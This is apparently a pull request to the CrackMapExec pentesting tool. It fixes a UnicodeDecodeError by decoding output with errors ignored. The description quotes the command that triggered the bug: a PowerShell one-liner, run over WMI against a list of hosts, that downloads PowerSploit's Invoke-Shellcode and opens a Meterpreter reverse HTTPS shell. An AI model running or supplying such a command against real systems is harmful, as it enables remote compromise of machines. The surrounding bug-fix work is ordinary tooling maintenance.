### PR TITLE
replaced ".decode('utf8')" with "unicode(x, errors='ignore')"

### DIFF
--- a/crackmapexec.py
+++ b/crackmapexec.py
@@ -57,13 +57,13 @@ BATCH_FILENAME  = ''.join(random.sample(string.ascii_letters, 10)) + '.bat'
 SMBSERVER_DIR   = 'served_over_smb'
 DUMMY_SHARE     = 'TMP'
 
-print_error  = lambda x: cprint("[-] ", 'red', attrs=['bold'], end=x.decode('utf8')+'\n')
-print_status = lambda x: cprint("[*] ", 'blue', attrs=['bold'], end=x.decode('utf8')+'\n')
-print_succ   = lambda x: cprint("[+] ", 'green', attrs=['bold'], end=x.decode('utf8')+'\n')
-print_att    = lambda x: cprint(x.decode('utf8'), 'yellow', attrs=['bold'])
-yellow = lambda x: colored(x.decode('utf8'), 'yellow', attrs=['bold'])
-green  = lambda x: colored(x.decode('utf8'), 'green', attrs=['bold'])
-red    = lambda x: colored(x.decode('utf8'), 'red', attrs=['bold'])
+print_error  = lambda x: cprint("[-] ", 'red', attrs=['bold'], end=unicode(x, errors='ignore')+'\n')
+print_status = lambda x: cprint("[*] ", 'blue', attrs=['bold'], end=unicode(x, errors='ignore')+'\n')
+print_succ   = lambda x: cprint("[+] ", 'green', attrs=['bold'], end=unicode(x, errors='ignore')+'\n')
+print_att    = lambda x: cprint(unicode(x, errors='ignore'), 'yellow', attrs=['bold'])
+yellow = lambda x: colored(unicode(x, errors='ignore'), 'yellow', attrs=['bold'])
+green  = lambda x: colored(unicode(x, errors='ignore'), 'green', attrs=['bold'])
+red    = lambda x: colored(unicode(x, errors='ignore'), 'red', attrs=['bold'])
 
 # Structures
 # Taken from http://insecurety.net/?p=768


### PR DESCRIPTION
Was running the cmd:

./crackmapexec.py -t 25 some-ips.txt --execm wmi -u user -p password -x "cmd.exe /c powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost MY-IP -Lport 443 -Force"

After all the fail/success messages at logging in, it tried to display the output of running the powershell command but failed:

```shell
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 327, in run
    result = self._run(*self.args, **self.kwargs)
  File "./crackmapexec.py", line 2981, in connect
    print_att(result)
  File "./crackmapexec.py", line 63, in <lambda>
    print_att    = lambda x: cprint(x.decode('utf8'), 'yellow', attrs=['bold'])
  File "/usr/lib/python2.7/encodings/utf_8.py", line 16, in decode
    return codecs.utf_8_decode(input, errors, True)
UnicodeDecodeError: 'utf8' codec can't decode byte 0x83 in position 83: invalid start byte
<Greenlet at 0x396a410: connect('<VICTIMIP>')> failed with UnicodeDecodeError
```
The offending code:

```python
                elif args.execm == 'wmi':
                    executer = WMIEXEC(args.command, args.user, args.passwd, domain, args.hash, args.share, noOutput)
                    result = executer.run(host, smb)
                    if result:
                        print_succ('{}:{} {} Executed specified command via WMI'.format(host, args.port, s_name))
                        print_att(result)
```
And:
```python
print_att    = lambda x: cprint(x.decode('utf8'), 'yellow', attrs=['bold'])
```

The variable *result* is just the powershell error message but it contains the character *\x83* for some reason which apparently is not utf8 decodeable. 

"Invoke-Shellcode : A positional parameter cannot be found that accepts argument\r\n '\x83??Payload'.\r\nAt line:1 char:171\r\n+ IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.\r\ncom/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); In\r\nvoke-Shellcode <<<<  \x83??Payload windows/meterpreter/reverse_https \x83??Lhost IP\r\nIP \x83??Lport 443 \x83??Force\r\n    + CategoryInfo          : InvalidArgument: (:) [Invoke-Shellcode], Paramet \r\n   erBindingException\r\n    + FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Shellcode\r\n \r\n"

So I googled the unicode error and it lead me to: http://stackoverflow.com/questions/12468179/unicodedecodeerror-utf8-codec-cant-decode-byte-0x9c and I replaced all x.decode('utf8') with unicode(x, errors='ignore') and that seemed to fix the problem as it'll still print everything it can, it'll just ignore any nonunicode characters.
